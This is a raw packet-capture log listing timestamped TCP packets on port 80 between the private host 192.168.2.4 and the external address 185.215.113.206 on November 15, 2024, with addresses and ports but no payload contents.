Nov 15, 2024 14:09:27.067217112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.067224026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067235947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.067243099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067248106 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.067289114 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.067306995 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.067868948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067887068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067902088 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067918062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067934036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067950010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.067951918 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.067960978 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.067990065 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.068892002 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.068909883 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.068927050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.068943977 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.068957090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.068959951 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.068984032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.069010019 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.069634914 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.069652081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.069669008 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.069684982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.069688082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.069696903 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.069701910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.069719076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.069744110 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.069765091 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.070437908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.070475101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.070491076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.070506096 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.070521116 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.070525885 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.070535898 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.070557117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.071264029 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.071281910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.071296930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.071321011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.071336031 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.071347952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.071372986 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168191910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168245077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168252945 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168263912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168281078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168299913 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168309927 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168329954 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168334007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168351889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168354034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168370008 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168386936 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168766022 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168787956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168806076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168826103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168843031 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168843031 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168855906 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168860912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.168895006 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.168911934 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169228077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169246912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169260979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169275999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169276953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169296026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169312000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169325113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169339895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169339895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169339895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169487953 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169856071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169873953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169889927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169905901 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169922113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169926882 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169939041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.169949055 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169960022 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.169986010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.170663118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.170681000 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.170702934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.170711994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.170718908 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.170726061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.170727015 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.170759916 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.170764923 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.170770884 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.170782089 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.170808077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.170816898 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.171642065 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.171659946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.171677113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.171691895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.171691895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.171709061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.171710968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.171719074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.171725988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.171732903 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.171752930 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.171761036 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.172446966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.172463894 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.172480106 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.172497034 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.172511101 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.172512054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.172530890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.172537088 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.172549009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.172566891 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.173372030 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.173388958 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.173403978 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.173420906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.173439980 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.173444986 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.173459053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.173463106 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.173468113 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.173477888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.173496008 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.173501968 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.173511028 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.174237967 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174257040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174273014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174274921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.174292088 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174298048 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.174308062 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174309969 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.174325943 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174335003 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.174352884 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.174937963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174956083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174972057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174987078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.174989939 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175004959 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175013065 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175024033 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175026894 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175040960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175051928 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175059080 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175061941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175076962 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175115108 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175828934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175846100 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175860882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175875902 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175889015 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175890923 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175908089 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.175923109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175935984 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.175973892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.176721096 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.176738024 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.176753044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.176767111 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.176780939 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.176783085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.176791906 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.176810980 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.176822901 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.176831961 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.176872969 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.177539110 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.177556038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.177572012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.177587986 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.177594900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.177603960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.177611113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.177623034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.177699089 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.178385973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.178401947 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.178416014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.178431034 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.178445101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.178459883 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.178467035 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.178474903 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.178489923 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.178497076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.178519011 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.178541899 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.179265976 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.179282904 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.179297924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.179331064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.179333925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.179347992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.179357052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.179380894 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.179403067 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.179414034 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.180113077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180130959 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180145025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180160999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180192947 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.180227995 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.180562973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180579901 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180594921 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180609941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180625916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180634022 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.180643082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.180663109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.180697918 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.181452990 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.181468964 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.181487083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.181499004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.181504011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.181520939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.181528091 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.181538105 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.181552887 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.181555033 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.181571007 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.181593895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.182306051 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.182326078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.182343960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.182360888 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.182364941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.182372093 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.182378054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.182384968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.182395935 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.182420969 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.183334112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183350086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183366060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183373928 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183388948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183388948 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.183399916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183412075 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.183442116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.183854103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183870077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183886051 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183902025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183916092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183928013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.183933020 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183948994 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183960915 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.183967113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.183979988 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.184005022 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.217636108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.218931913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.219268084 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.219316959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.312375069 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.312400103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.312418938 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.312438011 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.312464952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.312517881 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.312541008 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.312550068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.312557936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.312562943 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.312599897 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.312958956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.312977076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.312993050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.313008070 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.313013077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.313024998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.313031912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.313041925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.313054085 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.313080072 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.314305067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.314322948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.314340115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.314357042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.314358950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.314373970 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.314390898 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.314393044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.314393044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.314408064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.314425945 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.314471960 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.315095901 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.315144062 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.315190077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.315206051 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.315222979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.315236092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.315242052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.315246105 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.315259933 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.315268993 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.315279961 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.315320969 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.316179037 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.316199064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.316215038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.316230059 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.316231966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.316240072 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.316257000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.316258907 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.316276073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.316286087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.316306114 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.316306114 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.316595078 CET	80	49752	185.215.113.206	192.168.2.4
